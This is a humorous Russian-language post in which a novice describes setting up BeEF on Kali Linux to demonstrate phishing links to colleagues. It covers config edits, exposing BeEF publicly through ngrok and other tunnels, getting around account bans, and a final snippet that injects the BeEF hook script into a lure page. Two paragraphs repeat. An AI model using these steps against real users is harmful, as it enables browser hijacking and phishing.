Добрый день, дорогие читатели ...
Некоторое время назад попросили меня коллеги, продемонстрировать почему нельзя проходить по непонятным ссылкам или QR кодам. Сказать что тема не моя, совсем не чего не сказать... История умалчивает почему попросили меня, но раз надо так надо, поэтому взяв честно рабочую неделю с полной уверенностью что всё будет good приступил к выполнению задачи... Покрутив каким-то пальцем у виска было приято решения не париться и использовать фишинговый сайт и стандартную Beef на Kali Linux.
Далее будут описаны все трудности (Кровь, пот и слёзы, поэтому прошу убрать детей от экранов), с которыми я столкнулся как ламер ушатый, который в первый раз использовал beef. А не которым может помочь на тратить столько сил и нервов для решения обычных задач. Короче вот моя история:
Далее будут описаны все трудности (Кровь, пот и слёзы, поэтому прошу убрать детей от экранов), с которыми я столкнулся как ламер ушатый, который в первый раз использовал beef. А не которым может помочь на тратить столько сил и нервов для решения обычных задач. Короче вот моя история:
День первый:
Посмотрев лупоглазого мальчика на всем известном видо хостинге... Понял дело в шляпе пара часов и готово... Но не тут то было. Пляска началась сразу, согласно видео инструкции всё того же мальчика, нужно открыть и отредактировать файл config.yaml, который находиться в рабочем каталоге Beef. Найти его проблем не составило путь такой:
/etc/beef-xss/
Для изменения требуется root, но у мальчика этого не требовалось. Ну root, так root проблем нет ... открываем терминал sudo nano config.yaml. Тут с nano вспомнились детские годы и редактор Qbasic в Dos... Ностальгия однако. Далее согласно всё той же видео инструкции необходимо раскомментить следующие строки:
#public:/etc/beef-xss/
Для изменения требуется root, но у мальчика этого не требовалось. Ну root, так root проблем нет ... открываем терминал sudo nano config.yaml. Тут с nano вспомнились детские годы и редактор Qbasic в Dos... Ностальгия однако. Далее согласно всё той же видео инструкции необходимо раскомментить следующие строки:
#host: ""
#port: "443"
#https: true
Ну нет проблем убрать комменты легко... открываю файл ищу данный раздел в конфиге... И вот не задача у меня в файле его нет... И тут меня начинают терзать смутные сомнения:
1. Не тот файл я нашел?
2. Файл тот, но может по умолчанию в Kali обрезанная версия Beef только для local? Т.к. мальчик ставил Beef с нуля, а у меня он идет в подарок к Kali...
3. В файле есть Host, но какой не указано может RHost и туда надо писать ссылку на внешний IP?
Пройдя все 3 этапа на пять раз. Пришла идея посмотреть данный конфиг на Git... Но там куча примеров и у ВСЕХ есть раздел Public, блин но у меня нет. Скачав пару вариантов понял что, не чего не взлетает.
Так прошел первый день и осознав, что есть другие дела пошел обнять не любимую... (т.к. любимая не поймет)
День второй:
На следующий день мне постучали... тук тук Neo. Поняв быстро, что Neo - это не я, лег спать дальше... благо не любимая еще не ушла. Уже точно не помню как пришла идея создать раздел Public самому в файле, но как показало будущее это сработало.
И так теперь у нас есть раздел и он вроде работает. Уже изучив наизусть данный конфиг на всякий случай включил следующее:
web_server_imitation:
enable: true
type: apache
hook_404: true
hook_root: true
Ну теперь как казалось все проблемы решены и до финиша рукой подать... Как тогда я был не прав. Берем всем известный ngrok устанавливаем генерируем API Key и вперед... Создаем новый туннель, копируем ссылку. В раздел Public-host вставляем и вуа ля... Проверяем на демо странице и все ок... На этом данный день можно закончить подумал я и пошел встречать уже любимую с планами пожарить шашлык.
День третий:
Встав с утра и доев всё что осталось с предыдущего дня, решил проверить как работает моя супер задача... Ведь все основные проблемы решены Beef отрабатывает ngrok переадресовывает на порт все норм. Проверяя первое что бросается в глаза - это нелепая страница ngrok где необходимо нажать visit to site а только потом идет переадресация на демо страницу beef. Необходимо это исправить подумал я... Потратив 4 часа изучения всем доступной информации решения не нашлось. Решил отдохнуть и попробовать позже. Придя вечером к своему ноутбуку увидел что там уже ни кто не стучится, а на очередной тест ngrok мне выскакивает сообщения:Ngrok Account Banned
Блин это что за неведома зверушка, ведь в инете все так хвалят Ngrok. Ок но мы же не сдаёмся, поэтому создаем 2 ак (почта то халявная). И опять все работает но через 2 часа опятьNgrok Account Banned
Ну ладно подумал я создам перед демонстрацией 3 ак и он сработает этого хватит, но как быть со страницей Ngrok по умолчанию... Ведь они точно не нажмут visit to site...Начинаем дальше искать в поисковике наших "партнеров" решение.... Так закончился этот день.
День четвертый:
И так первое что приходит на ум не использовать free ak Ngrok надо оплатить минимум и будет тебе счастье. Проходим по ссылке на оплату 6 баксов (я человек не жадный) вводим номера карты бабушки соседки "МИР" и ответ ... ВАША КАРТА НЕ ПРИНЯТА.... Чего блин... Пробуем на другом ак и тоже самое... Другая карта. И опять.
Так заводить карту или покупать другой страны времени уже нет и вероятность, что это сработает тоже мала. Т.к. ак Ngrok создавал без VPN. Необходимо решать проблему сейчас и быстрее... Запускаем поиск по альтернативам Ngrok...
И тут понеслось:
Ссылка скрыта от гостей
Ссылка скрыта от гостей
Ссылка скрыта от гостей
FRP
Ссылка скрыта от гостей
SirTunnel
Bore
Ссылка скрыта от гостей
и т.д.В результате могу сказать не одна из них не подошла. У какого то такая же стартовая страница, кто-то отваливается через 20 сек, кто-то не поддерживает протокол, кто-то банит как видит hook от beef.
В общем просидев до часу ночи и вспоминая усталого бидона (чтоб ему только трапы снились)... понял что дело дрянь... И я точно завтра сделаю лажу... (Хотя брал рабочую неделю, а по видео лупоглазого мальчика все должно быть за 2 часа сделано).
Уже не знаю точно сколько было время, но мне попалась вот такая штука loophole и уже потеряв все надежды и устав в Kali устанавливать и тестировать все варианты решил запустить её... ./loophole http 3000... Редактирую конфиг запускаю beef... и о чудо нет страницы сразу на демку beef кинуло и вроде не отваливается. Вроде все ок и моя надежда пробудилась... Пошел опять её испробовать на любимой и тут тоже все норм.
День пятый:
Да вот только хрен там так получиться ведь у меня в каталоге beef нет html вообще... от слово совсем... а до показа 30 мин.
/etc/beef-xss/
Как выяснилось в каталоге beef теперь существует файл-ссылка на домашнюю html перейдя по этому пути мы можем заменить html и т.д.
Ссылка для тех кто также как и я будут её долго искать
/var/lib/beef-xss/extensions/demos/html/butcher/
<script src="jquery-1.12.4.min.js"></script>
<script>
function showfriends() {
$("#hamper").hide();
$("#friends").show();
}
function showHamper() {
$("#friends").hide();
$("#hamper").show();
}
</script>
<script>
var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>
Вставляем hook от beef в свою страницу и ок...
ЗАДАЧА ВЫПОЛНЕНА...
Итог: Очень надеюсь что хотя бы кому-то это поможет... Спасибо огромное если дочитали до конца. Всегда уважающий Наше общество Ваш Ламер Ушастый.
